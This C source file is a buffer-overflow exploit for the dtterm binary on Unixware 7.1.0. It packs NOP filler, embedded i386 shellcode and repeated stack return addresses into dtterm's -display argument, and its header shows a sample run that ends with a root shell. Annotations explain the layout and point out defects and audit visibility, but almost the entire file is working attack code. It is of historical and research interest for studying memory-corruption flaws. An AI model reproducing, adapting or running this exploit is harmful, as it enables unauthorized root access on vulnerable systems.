/*
 *  Unixware 7.1.0 xploit for dtterm 
 *  
 *  By: Fermín J. Serna <fjserna@ngsec.com>
 *      Next Generation Security Technologies
 *      http://www.ngsec.com
 * 
 *  This is not the overflow in CSSA-2001-SCO.26
 *
 * $ pkginfo | grep dtterm
 * patch erg711857 erg711857 - dtterm fix for - dtterm argument buffer overflow
 * $ ./dtterm-x
 * dtterm xploit for Unixware 7.1.0 by Fermín J. Serna <fjserna@ngsec.com>
 * Next Generation Security Technologies http://www.ngsec.com
 * Len: 2066 Return address: 0x804767c
 *
 * # id
 * uid=0(root) gid=0(root)
 *
 *  Madrid 31/12/2001
 *
 */

#include <stdio.h>
#include <string.h>

#define SIZE 2064+3     /* length of the argument buffer in main(); the macro body is unparenthesised, so it is only safe as a bare array bound as used below */
#define NOP 0x90        /* i386 single-byte NOP opcode, used as filler */
#define OFFSET 500      /* added to the sampled stack pointer to form the address value written into the buffer */
#define NUM_ADDR 8      /* number of 4-byte address copies written after the payload bytes */

/*
 * Machine-code payload credited to zhodiac@softhome.net, kept as a string
 * literal. main() measures it with strlen(), so an embedded 0x00 byte would
 * silently truncate what gets copied. Bytes are reproduced verbatim.
 */
char shellcode[]= /* zhodiac@softhome.net */
 "\xeb\x17\x5e\x31\xdb\x88\x5e\x07\x89\x5e\x0c\x88\x5e\x11\xb3\x2e"
 "\xfe\xc3\x88\x1e\x88\x5e\x04\xeb\x18\xe8\xe4\xff\xff\xff\x5a\x62"
 "\x69\x6e\x5a\x73\x68\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"
 "\xc3\x31\xdb\x31\xc0\x53\xb0\x17\xe8\xec\xff\xff\xff\x53\xb0\x2e"
 "\xe8\xe4\xff\xff\xff\xb0\x3b\x53\x53\x56\x56\xeb\xdc";

/*
 * Returns the current stack pointer (i386 only).
 * The inline asm copies %esp into %eax and the function then falls off the
 * end with no return statement; the caller only gets a value because %eax is
 * the i386 return register. That is undefined behaviour in standard C and is
 * not guaranteed to survive optimisation or any other architecture.
 */
long get_esp() { __asm__("movl %esp,%eax"); }

/*
 * Builds one oversized string in buffer[] and passes it to dtterm as the
 * value of its -display option.
 *
 * Layout of buffer[] (sizeof == SIZE == 2067 bytes), filled exactly:
 *   [NOP filler][shellcode][NUM_ADDR x (get_esp()+OFFSET) as unsigned long][':' '0' '\0']
 * The filler length is computed so the four parts add up to sizeof(buffer);
 * the trailing ":0" keeps the argument shaped like a display spec.
 *
 * Review notes (code left as is):
 *  - execl() is called without <unistd.h>, so it is implicitly declared.
 *  - printf("%d", strlen(buffer)) passes a size_t to a "%d" conversion.
 *  - The two banner printf() calls carry no newline, so stdout may still be
 *    unflushed when execl() replaces the process image.
 *  - execl() only returns on failure; that failure is not checked and main()
 *    then falls off the end.
 *  - Defender's view: the whole payload travels in argv, so it is visible to
 *    process accounting, auditing and ps-style tooling.
 */
int main(int argc, char **argv) {
char buffer[SIZE];       /* the argument under construction */
char *ch_ptr;            /* byte cursor into buffer */
unsigned long *lg_ptr;   /* word cursor used to write the address copies */
int counter;

 printf("dtterm xploit for Unixware 7.1.0 by Fermín J. Serna <fjserna@ngsec.com>");
 printf("Next Generation Security Technologies http://www.ngsec.com");

 /* 1. NOP filler: everything that is not payload, addresses or the 3-byte tail */
 ch_ptr=buffer;
 memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-NUM_ADDR*4-3);
 ch_ptr+=sizeof(buffer)-strlen(shellcode)-NUM_ADDR*4-3;
 /* 2. Payload bytes, without the literal's terminating NUL */
 memcpy(ch_ptr,shellcode,strlen(shellcode));
 ch_ptr+=strlen(shellcode);
 /* 3. NUM_ADDR copies of the sampled stack pointer plus OFFSET.
  *    The reservation above is NUM_ADDR*4 bytes, so this assumes
  *    sizeof(unsigned long) == 4 on the target. */
 lg_ptr=(unsigned long *)ch_ptr;
 for(counter=0;counter<NUM_ADDR;counter++) *(lg_ptr++)=get_esp()+OFFSET;
 /* 4. ":0" suffix and NUL terminator: the 3 bytes reserved in step 1 */
 ch_ptr=(char *)lg_ptr;
 *(ch_ptr++)=':';
 *(ch_ptr++)='0';
 *(ch_ptr++)='\0';

 /* Report what was built, then replace this process with dtterm */
 printf("Len: %d Return address: %#x\n",strlen(buffer),get_esp()+OFFSET);
 execl("/usr/dt/bin/dtterm","dtterm","-display", buffer, NULL); 

}

